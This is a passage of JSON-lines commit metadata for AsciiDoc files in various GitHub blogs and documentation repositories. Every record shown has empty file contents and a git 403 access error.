2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce4f73d9eb7bad56ba00131249459f0e84e2a4db","subject":"create post The Best Headphones That Money Can Buy...","message":"create post The Best Headphones That Money Can Buy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Best-Headphones-That-Money-Can-Buy....adoc","new_file":"_posts\/2018-02-26-The-Best-Headphones-That-Money-Can-Buy....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc0deab328498d2d7f93dc69caf1b395d5738208","subject":"Liquibase MongoDB guide","message":"Liquibase MongoDB guide\n\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/liquibase-mongodb.adoc","new_file":"docs\/src\/main\/asciidoc\/liquibase-mongodb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47e025c8fd2238111d0fe97879d771c489b9092e","subject":"add contributor guide","message":"add contributor guide\n\nSigned-off-by: Sebastian Ho\u00df <1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>","repos":"sebhoss\/generic-types","old_file":"CONTRIBUTING.asciidoc","new_file":"CONTRIBUTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebhoss\/generic-types.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"79711bcbfcab8214618aa9ccf71c836e646b5fba","subject":"Update 2015-11-08-Hubpress-Create-a-Post.adoc","message":"Update 2015-11-08-Hubpress-Create-a-Post.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2015-11-08-Hubpress-Create-a-Post.adoc","new_file":"_posts\/2015-11-08-Hubpress-Create-a-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb483231e4f7eec70d91eb297d85074b9031eda7","subject":"Update 2019-01-31-essential-Java-classes.adoc","message":"Update 2019-01-31-essential-Java-classes.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-essential-Java-classes.adoc","new_file":"_posts\/2019-01-31-essential-Java-classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07901a35c39f17bf4293cc39a52d4beb236beced","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c55a8d6b82ca838a6ff0e9835158d09426e40de","subject":"Update 2016-11-07-092800-Monday-Morning.adoc","message":"Update 2016-11-07-092800-Monday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-092800-Monday-Morning.adoc","new_file":"_posts\/2016-11-07-092800-Monday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a651a442a738903641a9b2e74829cd70baec487c","subject":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","message":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d431addb0b1b68dc422c6decfb0a55437a2ef2f9","subject":"y2b create post The Newest Member Of Unbox Therapy...","message":"y2b create post The Newest Member Of Unbox Therapy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-05-The-Newest-Member-Of-Unbox-Therapy.adoc","new_file":"_posts\/2017-07-05-The-Newest-Member-Of-Unbox-Therapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ea596a15b096b981b5518b31bf6bcc963a5b549","subject":"Create index.adoc","message":"Create index.adoc","repos":"camunda\/camunda-bpm-spring-boot-starter,camunda\/camunda-spring-boot-starter,camunda\/camunda-spring-boot-starter","old_file":"docs\/src\/main\/asciidoc\/changelog\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/changelog\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-spring-boot-starter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4616d4d0c0a02060f1f3d2cd0d84036d95272914","subject":"Publish 2017-02-25adoc.adoc","message":"Publish 2017-02-25adoc.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adoc.adoc","new_file":"2017-02-25adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b65abb8520b2f262b1894f97c8db38c9206f374a","subject":"y2b create post Behold LG's Gigantic 4K TV for $20,000 - CES 2013","message":"y2b create post Behold LG's Gigantic 4K TV for $20,000 - CES 2013","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-07-Behold-LGs-Gigantic-4K-TV-for-20000--CES-2013.adoc","new_file":"_posts\/2013-01-07-Behold-LGs-Gigantic-4K-TV-for-20000--CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13e3a6f3c4e13d742af0e0eab76387d8df83c838","subject":"Add common snippet to start the application","message":"Add common snippet to start the application\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-startTheApplication.adoc","new_file":"src\/main\/docs\/common-startTheApplication.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"136289a0c2e4a14d2131f33f82a12348d454ef4e","subject":"Added testing instructions","message":"Added testing instructions\n","repos":"degyves\/VimPyServer","old_file":"test\/TESTING.asciidoc","new_file":"test\/TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/degyves\/VimPyServer.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"cbdff427542a763039d3a96d120a0a6ce8e5f293","subject":"Publish 2016-12-2-3-Dpen.adoc","message":"Publish 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecbaf0624eb6d3b681368bf45f863366f9868cb2","subject":"Publish 19-02-2015-Python-para-Principiantes.adoc","message":"Publish 19-02-2015-Python-para-Principiantes.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"19-02-2015-Python-para-Principiantes.adoc","new_file":"19-02-2015-Python-para-Principiantes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46b3e4bd925529e4e9008ccd9d5a6815e911de61","subject":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","message":"Publish 2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_file":"2099-1-1-Puzzle-2-Hack-Me-If-You-Can.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecac8c2028b02b12b5934201833bc79a3f4186df","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a501727b22a5ff336e5ab4fef5f892cb8fa0deb","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a17ecccc877ee96475f179b87c2afc95e7cb0a0","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fd248ed5ec19f0680a352ccddbc274ec426ae93","subject":"Update 2018-02-27-When-the-RTFM-sucks.adoc","message":"Update 2018-02-27-When-the-RTFM-sucks.adoc","repos":"costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io","old_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/costalfy\/costalfy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e051dc1dcfbf5b741ae06f0c73d22659557bbb60","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dbd032f43f36eaf03b18dbda5a4770129af4d4a","subject":"Update 2015-04-15-Quest-ce-que-lAPM.adoc","message":"Update 2015-04-15-Quest-ce-que-lAPM.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Quest-ce-que-lAPM.adoc","new_file":"_posts\/2015-04-15-Quest-ce-que-lAPM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1de60eeebc4a43ee0c5195a3979cde8347e0fb50","subject":"Update 2015-09-14-.adoc","message":"Update 2015-09-14-.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-.adoc","new_file":"_posts\/2015-09-14-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1830461cfcc6790e691d004bac0bcd880656bdc1","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"014f917a0b7d7e94de461126f0d754c707ed8fa4","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af7e86efabca2e84a4dfc671c28edb502663fd0f","subject":"Update 2016-06-22-First-from-London.adoc","message":"Update 2016-06-22-First-from-London.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-06-22-First-from-London.adoc","new_file":"_posts\/2016-06-22-First-from-London.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"096a1ab179508771332c130ff71993a205f8f83e","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae6b44348a9954c428edf811a06c8f6e3ab7e939","subject":"Add NOTES.adoc","message":"Add NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8189f2c40ad3523ebcae6ce6996e5b6b43640786","subject":"Update 2015-07-22-Hoge.adoc","message":"Update 2015-07-22-Hoge.adoc","repos":"fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io","old_file":"_posts\/2015-07-22-Hoge.adoc","new_file":"_posts\/2015-07-22-Hoge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fr-developer\/fr-developer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66a5caf3c87e221280ea8555ca7261d0dccf87dc","subject":"Update 2016-04-10-fuckyou.adoc","message":"Update 2016-04-10-fuckyou.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-10-fuckyou.adoc","new_file":"_posts\/2016-04-10-fuckyou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef101b20cc3c53d0df43ea1ad0bc1eaf9a7a7242","subject":"Update 2016-12-04-Physics.adoc","message":"Update 2016-12-04-Physics.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-12-04-Physics.adoc","new_file":"_posts\/2016-12-04-Physics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0800991cdcc1995c7c21ec1a06122f5259fe8191","subject":"NEWS: Version 0.1.0","message":"NEWS: Version 0.1.0\n","repos":"josh-berry\/homectl,josh-berry\/homectl","old_file":"NEWS.asciidoc","new_file":"NEWS.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/josh-berry\/homectl.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ac610a313d4162b32bfc9553ce20395e7e0c536","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95414e03abd576f7a2d3ec334c8d9ce764644b39","subject":"Tip default profile","message":"Tip default profile\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-tipDefaultProfile.adoc","new_file":"src\/main\/docs\/common-tipDefaultProfile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3725e7455c4ba79adc57f279194905da0e1d3f0","subject":"Delete the file at '2017-02-25adocadoc-part-1.adoc'","message":"Delete the file at '2017-02-25adocadoc-part-1.adoc'","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adocadoc-part-1.adoc","new_file":"2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23f05726e6465bde210c7bb52a6ebd5153cab5f4","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8c643e833d4e6064726b8747f63282a09594bc6","subject":"[Docs] Fix a typo in Create Index naming limitation (#30891)","message":"[Docs] Fix a typo in Create Index naming limitation (#30891)\n\n","repos":"nknize\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/indices\/create-index.asciidoc","new_file":"docs\/reference\/indices\/create-index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b4f2570cabe6b4bfd3469d95982590d783d589d","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31fd831914460a79588020152ff360b58de8820e","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56d1a78ef52fc6774ba74194c6d9f293c45c4090","subject":"Update 2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","message":"Update 2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/hubpress","old_file":"_posts\/2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","new_file":"_posts\/2016-11-16-Setting-up-Angular2-CLI-with-Maven-in-enterprise-network-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b7e62c3305e4d5de8d1f60908b45efb661433b0","subject":"Update 2015-08-11-Propuesta-de-Reestructuracion-de-repositorios-de-Bachaco-ve.adoc","message":"Update 2015-08-11-Propuesta-de-Reestructuracion-de-repositorios-de-Bachaco-ve.adoc","repos":"Bachaco-ve\/bachaco-ve.github.io,Bachaco-ve\/bachaco-ve.github.io,Bachaco-ve\/bachaco-ve.github.io","old_file":"_posts\/2015-08-11-Propuesta-de-Reestructuracion-de-repositorios-de-Bachaco-ve.adoc","new_file":"_posts\/2015-08-11-Propuesta-de-Reestructuracion-de-repositorios-de-Bachaco-ve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bachaco-ve\/bachaco-ve.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d23937f833f6406d25a1a180bd99bc5e13064000","subject":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","message":"Update 2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_file":"_posts\/2017-09-09-Series-that-I-want-to-hack-my-complicated-work-Part-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1aa577bcc3d135113ea3742459cbe09b748e3e5","subject":"Update 2017-10-18-Blog-Title.adoc","message":"Update 2017-10-18-Blog-Title.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-18-Blog-Title.adoc","new_file":"_posts\/2017-10-18-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3bebcdbf9c0e4b623a88b2ba87b479f15134e8b","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 